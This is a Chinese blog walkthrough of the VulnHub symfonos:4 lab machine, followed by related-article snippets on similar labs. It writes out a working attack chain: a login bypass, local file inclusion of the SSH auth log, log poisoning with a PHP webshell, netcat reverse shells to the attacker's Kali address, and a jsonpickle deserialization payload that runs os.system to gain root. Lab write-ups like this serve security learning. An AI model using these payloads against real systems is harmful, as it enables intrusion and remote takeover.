vulnhub-symfonos-4(文件包含 & ssh投毒& 命令执行 & linux提权)

最新推荐文章于 2023-03-04 16:04:36 发布
最新推荐文章于 2023-03-04 16:04:36 发布
阅读量691 收藏 6
点赞数 1
分类专栏: security 文章标签: 渗透测试 安全漏洞 kali linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ma79328/article/details/116310060
版权

靶场环境为内网地址
靶机:172.168.20.133
靶场镜像:https://www.vulnhub.com/entry/symfonos-4,347/
kali:172.168.20.110

1、打开靶场浏览器访问靶场IP地址
在这里插入图片描述
2、扫描目录
使用kali自带目录扫描工具进行目录扫描

dirb http://172.168.20.133/ /usr/share/dirb/wordlists/big.txt -X .php

发现一个php的登陆页面
在这里插入图片描述
3、访问atlantis.php页面
使用万能密码绕过登录界面
在这里插入图片描述
4.发现文件包含,尝试包含ssh日志文件
在这里插入图片描述

#Linux中的登录日志在/var/log/auth.log中
http://172.168.20.133/sea.php?file=../../../../var/log/auth

在这里插入图片描述
5、尝试ssh投毒、让ssh登录日志去记录webshell

ssh '<?php system($_GET[mmm])?>'@172.168.20.133

第一次登录会下发私钥,选择yes即可
在这里插入图片描述
6、继续包含auth.log日志,发现可以正常命令执行
在这里插入图片描述
7、反弹shell给kali

#kali开启监听
nc -nlvp 555

#执行以下payload
http://172.168.20.133/sea.php?file=../../../../var/log/auth&mmm=nc -nv 172.168.20.110 555 -e /bin/bash

在这里插入图片描述
8、发现是一个不完整的shell,可以用python获得/bin/bash中的shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述
9、查看本地开放的端口

 ss -tulpn

在这里插入图片描述
10、使用socat代理本地的端口

socat tcp-listen:7000,reuseaddr,fork tcp:localhost:8080

在这里插入图片描述

11、访问该地址7000端口

在这里插入图片描述

12、使用burp拦截,发现base64,试着decode

在这里插入图片描述
13、发现是json
参考https://versprite.com/blog/application-security/into-the-jar-jsonpickle-exploitation/
调用python对象
{“py/object”: “main.Shell”, “py/reduce”: [{“py/type”: “subprocess.Popen”}, {“py/tuple”: [“whoami”]}, null, null, null]}
在这里插入图片描述
14、调用python执行系统函数、写入反弹shell到kali
修改参数:

{"py/object": "__main__.Shell", "py/reduce": [{"py/type": "os.system"}, {"py/tuple": ["nc -nv 172.168.20.110 888 -e /bin/bash"]}, null, null, null]}

15.1、encode
在这里插入图片描述
15.2、kali开始监听

nc -nlvp 888

在这里插入图片描述
15.3、替换base64
在这里插入图片描述
15.4、burp放包

16、成功反弹shell,当前权限为root、得到flag
在这里插入图片描述
刚开始学习漏洞原理,纯属小白,欢迎指正
参考链接:
https://pentesterjourney.com/2019/10/04/vulnhub-symfonos-4-walkthrough/
[https://www.youtube.com/watch?v=gkIvUJUhan8]
(https://www.youtube.com/watch?v=gkIvUJUhan8)

简单符号
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Vulnhub-symfonos: 1
Demonering的博客
09-10 1341
摘要: 渗透大致流程: 通过Kali攻击机nmap扫描IP 扫描开放端口号并查看对应服务 通过发现的SMB服务使用enum4linux查看共享文件夹名和用户名,以及使用smbclient枚举查看 通过匿名用户anonymous发现用户helios的登陆密码 登录helios后发现提示目录文件 访问该网页发现为wordpress的网站 利用wpscan扫描发现两个漏洞插件 使用searchsploit查找对应漏洞payload(利用本地文件包含漏洞) 利用本地文件包含/var/mail/h
oscp——symfonos:4(未完成)
王嘟嘟的博客
01-16 676
0x00 前言 这个是练习的第7个机子。 目标地址 https://www.vulnhub.com/entry/symfonos-4,347/ 0x01 实验 1.信息收集 1.1 ip收集 1.2 开放端口
vulhub php文件包含漏洞复现
weixin_53730939的博客
03-04 334
vulhub php文件包含漏洞复现过程
SYMFONOS4:CTF SYMFONOS4的开发
04-08
SYMFONOS4 Desarrollo del CTF SYMFONOS4 1.虚拟机配置 Descarga de la VM: : VMWARE Workstation上的无VM功能。 Toca实用工具VIRTUALBOX和VMWARE WORKSTATION可以在BRIDGE中使用。 2.埃斯卡尼奥·德波多斯 # Nmap 7.91 scan initiated Sun Apr 4 17:41:16 2021 as: nmap -n -P0 -p- -sS -sC -sV -vv -T5 -oA full 192.168.1.136 Nmap scan report for 192.168.1.136 Host is up, received arp-response (0.00055s latency). Scanned at 2021-04-04 17:41:18 ED
Vulnhub 靶机 zico2 write up phpLiteAdmin cms写入马+另一处文件包含页面 getshell sudo zip 提权
YouthBelief的博客
12-27 1815
Vulnhub 靶机 zcio2 write up0x00 靶机搭建0x01 信息收集0x02 漏洞挖掘思路一:80 http思路二:22ssh 爆破步骤一:80web探测发现目录遍历漏洞步骤二:寻找cms漏洞并利用步骤三:文件包含+上传蚁剑连接步骤四:翻翻文件步骤五:尝试ssh登录步骤六:提权0x03 总结 0x00 靶机搭建 下载链接 https://download.vulnhub.com/zico/zico2.ova 运行环境 VirtualBox 网络 仅主机 kali 也配置 该网
linux后台执行命令&和nohup的具体使用方法
09-14
Linux操作系统中,后台执行命令是提高工作效率和系统资源利用率的重要技巧。本文主要讲解两种常见的后台执行命令:`&` 和 `nohup`。 首先,`&` 符号用于将命令放入后台执行。当你在命令末尾添加 `&` 时,程序将...
wzdxy#blog-hexo#mac & linux 终端中连接 ssh1
07-25
手动模式按照以下格式配置即可, 支持多个 ssh 配置, 这样就可以任意连接多台服务器了IdentityFile ~/.ssh/id_rsa # 私钥文件的路径
权限提升-linux提权手法总结
01-14
### 权限提升-linux提权手法总结 #### 1. Linux提权概述 在Linux系统中,权限管理是一项至关重要的安全措施。用户被赋予不同级别的权限来访问系统资源和服务。然而,在某些情况下,攻击者可能会试图通过各种手段来...
Linux下使用SSH远程执行命令方法收集
09-14
Linux系统中,SSH(Secure Shell)是一种广泛使用的网络协议,用于安全地远程登录到另一台计算机并执行命令SSH提供了加密的网络通信,确保数据传输的安全性。本篇文章将详细探讨如何在Linux环境下利用SSH远程...
RAID-P430-M2&Drv&VMware&B59002
最新发布
07-31
(2) 选择 Troubleshooting Options 菜单,开启 SSH 服务和 ESXi Shell 功能; (3) 通过管理 IP 登陆 Vphere Web client 界面,根据系统版本准备对应 vib 格式驱动文件,将驱动 文件上传到/tmp 路径下; (4) 在 ESXi ...
Vulnhub DC9|下载|渗透笔记|knockd敲门服务|文件包含漏洞
qq_60115503的博客
04-19 1308
VulnhubDC9下载靶场提取码:lyq1 将下载好的靶场导入VMware,虚拟机设置网络模式为nat模式,即可开启渗透 主机发现 首先查看自己属于的网段ip 进行nmap主机发现 nmap -sP -sn 192.168.106.1/24 -sP进行主机发现发送ping包 -sn进行NULL扫描 探测到ip地址为192.168.106.129 所以我们进一步了解该靶场的服务 使用nmap -sV -A -T4 192.168.106......
【甄选靶场】Vulnhub百个项目渗透——项目二十二:Wakanda_1(LFI本地文件包含,pip提权
人间体佐菲的博客
09-24 849
Vulnhub百个项目渗透——项目二十二:Wakanda_1(LFI本地文件包含,pip提权)信息安全,网络安全,渗透测试
VulnHub——CH4INRULZ
江左盟的博客
04-13 1129
简介 这是VulnHub中非常简单的一个靶机,通过本地文件包含漏洞结合上传绕过漏洞获得Web服务权限,最后通过内核漏洞提升权限获得root权限。 信息收集 使用fping 192.168.204.0/24 -agq探测局域网内其他主机,发现存在一个132主机,如图: 然后使用nmap 192.168.204.132 --max-rate 1000 -A扫描常用端口及服务,发现开启21,...
【网络安全】文件包含漏洞--通过日志投毒getshell
热门推荐
你在看屏幕的同时,屏幕也在注视着你
09-04 1万+
文件包含漏洞--通过日志投毒getshell
Vulnhub---Tomato
从不专注的人的博客
06-01 435
Tomato(文件包含getshell) 这个靶机是通过文件包含漏洞进行的getshell,主要姿势是将含有一句话木马的内容记录到ssh的登录日志中,然后利用文件包含漏洞进行包含,从而拿到shell 靶机下载地址:http://www.vulnhub.com/entry/tomato-1,557/ 信息收集 扫描目标网段确定ip地址 nmap -sP 172.16.58.0/24 扫描该ip开放端口 nmap -A -p- 172.16.58.128 扫描出来的端口,针对打开的端口进行访问 发现漏洞
symfonos靶机
haha1314的博客
08-10 768
一、 信息收集 存活主机 开放端口 Enum4linux 猜测aeolus可能为用户名 尝试爆破:sergioteamo 登陆 4 转到msf里面 在检查网络相关信息时,发现可疑之处,靶机一直监听其本机的8080端口,且只允许来自靶机自身的连接 这里自然想到利用端口转发,此处利用portfwd端口转发/重定向工具,其集成到metasploit内, 然后访问自己的9000端...
VulnHub系列』symfonos: 3-Walkthrough
ins1ght的博客
10-16 1025
靶机发布日期:2019年7月20日。经过了曲折的页面、目录枚举,发现shellshock漏洞,随后使用MSF获取到了shell。提权过程中先后使用手工、脚本对信息进行收集,最后使用pspy发现了root权限运行的ftpclient.py脚本。tcpdump嗅探到ftp服务的用户名、密码,随后登录SSH,修改ftpclient.py脚本获得root权限。
文件包含之日志中毒(User-Agent)
墨痕诉清风的博客
06-28 1516
目录一、本地文件包含二、日志中毒获取反弹shell获得目标服务器的完全控制权方法一:方法二:/var/log/auth.log  本地文件包含漏洞指的是包含本地的php文件,而通过PHP文件包含漏洞入侵网站,可以浏览同服务器所有文件,并获得webshell。看见?page=标志性注入点,提示我们输入?=page=index.php通过报错,我们可以知道当前文件包含的目录路径是/var/www/dvwa/vulnerabilities/fi/我们可以通过../../../../../etc/passwd 试一
nohup java -jar jar名字.jar & ,执行了这个命令后是不是可以关掉Xshell
06-10
是的,执行 `nohup java -jar jar名字.jar &` 命令后,Java程序已经在后台运行了,而且不会受到终端的影响,因此您可以关闭Xshell终端窗口,Java程序仍然会继续运行。 但是需要注意的是,如果您使用的是SSH连接,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值